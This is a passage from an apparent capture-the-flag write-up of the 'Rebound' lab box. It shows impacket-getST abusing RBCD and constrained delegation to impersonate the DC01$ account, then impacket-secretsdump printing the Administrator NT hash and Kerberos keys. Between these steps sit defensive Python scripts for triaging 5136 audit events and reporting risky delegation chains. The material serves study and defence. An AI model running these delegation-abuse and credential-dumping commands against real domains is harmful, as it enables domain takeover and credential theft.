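            "why": SENSITIVE_ATTRIBUTES[attr],
            "self_write": self_write,
        })
    return findings


def _ev(subject, dn, attr, op=OP_VALUE_ADDED, domain="rebound"):
    return {"SubjectUserName": subject, "SubjectDomainName": domain, "ObjectDN": dn,
            "AttributeLDAPDisplayName": attr, "OperationType": op}


# Constructed 5136 records. DNs other than the OU are assumed.
SAMPLE_EVENTS = [
    # Mirrors the dacledit command: oorend writes the OU's DACL.
    _ev("oorend", "OU=SERVICE USERS,DC=REBOUND,DC=HTB", "nTSecurityDescriptor"),
    # Mirrors the rbcd command: delegator$ writes its own RBCD attribute.
    _ev("delegator$", "CN=delegator,CN=Computers,DC=rebound,DC=htb",
        "msDS-AllowedToActOnBehalfOfOtherIdentity"),
    # Benign and allowlisted: an admin editing a description and account flags.
    _ev("Administrator", "CN=tbrady,CN=Users,DC=rebound,DC=htb", "description"),
    _ev("Administrator", "CN=tbrady,CN=Users,DC=rebound,DC=htb", "userAccountControl"),
]

if __name__ == "__main__":
    for finding in triage_5136(SAMPLE_EVENTS):
        print(finding)
```

Two findings come back: the DACL write on the OU by oorend, and the self-write of the RBCD attribute by delegator$. 5136 is only generated if a SACL on the objects requests auditing of writes, so the prerequisite is an audit policy that covers OUs and computer objects, not just the event parser.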
We can now obtain a ticket via the delegation operation.
Once the ticket is obtained, it can be used in an S4U2Proxy request, made by DELEGATOR$ on behalf of the impersonated user, to obtain access to one of the services DELEGATOR$ can delegate to.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
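The chain above works because three settings line up: DELEGATOR$ is allowed to delegate to http/dc01.rebound.htb, ldap_monitor (an account with an SPN) sits in DELEGATOR$'s RBCD descriptor, and the DC01$ computer account, unlike Administrator, is not marked sensitive, so it can be impersonated. The report below is an added example of mine, not code from the writeup or impacket, showing how an auditor would surface exactly that combination from directory data. The entries are constructed from what the writeup reports; the SPN values, the absence of protocol transition on DELEGATOR$ and the `rbcdTrustees` field (msDS-AllowedToActOnBehalfOfOtherIdentity is a binary security descriptor in LDAP, assumed here to be pre-resolved to trustee names the way `impacket-rbcd -action read` prints them) are assumptions.

```python
# Added example (not from the writeup): summarise constrained delegation, the
# RBCD chains layered on top of it, and sensitive accounts that lack
# delegation protection. Entries are constructed; see the lead-in for what
# is assumed.

TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")
NOT_DELEGATED = 0x100000                     # "account is sensitive and cannot be delegated"


def delegation_report(entries, sensitive=("Administrator", "DC01$")):
    """Return who can delegate where, which RBCD trustees inherit that reach,
    and which sensitive accounts could still be impersonated."""
    by_name = {e["sAMAccountName"]: e for e in entries}
    report = {"constrained": [], "rbcd_chains": [], "unprotected_sensitive": []}
    for e in entries:
        targets = e.get("msDS-AllowedToDelegateTo", [])
        if targets:
            report["constrained"].append({
                "account": e["sAMAccountName"],
                "targets": targets,
                "protocol_transition": bool(e["userAccountControl"] & TRUSTED_TO_AUTH_FOR_DELEGATION),
            })
        for trustee in e.get("rbcdTrustees", []):
            # An RBCD trustee of an account that itself has constrained
            # delegation reaches that account's targets in two S4U2Proxy hops.
            t = by_name.get(trustee)
            report["rbcd_chains"].append({
                "chain": [trustee, e["sAMAccountName"]] + targets,
                # The trustee needs an SPN of its own to start the S4U exchange.
                "trustee_has_spn": bool(t and t.get("servicePrincipalName")),
            })
    for name in sensitive:
        e = by_name.get(name)
        if e is None:
            continue
        protected = bool(e["userAccountControl"] & NOT_DELEGATED) or e.get("protectedUsersMember", False)
        if not protected:
            report["unprotected_sensitive"].append(name)
    return report


# Constructed entries. SPN values are placeholders; the writeup does not show them.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "delegator$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["http/dc01.rebound.htb"],
     "rbcdTrustees": ["ldap_monitor"],
     "servicePrincipalName": ["host/delegator.rebound.htb"]},
    {"sAMAccountName": "ldap_monitor", "userAccountControl": 0x10200,
     "servicePrincipalName": ["ldapmonitor/dc01.rebound.htb"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x100200},  # NOT_DELEGATED set
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000},            # no protection
]

if __name__ == "__main__":
    for section, rows in delegation_report(SAMPLE_ENTRIES).items():
        print(section, rows)
```

The report lists the chain `ldap_monitor -> delegator$ -> http/dc01.rebound.htb` and names DC01$ as the unprotected sensitive account; marking Administrator as sensitive closed one door but left the domain controller's own account open, which is the gap the getST command exploits. Flagging every RBCD trustee of an account that already delegates to a Tier-0 service is the check that would have caught this before it was used.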
Finally, we can get the Administrator hash via secretsdump.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-secretsdump -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...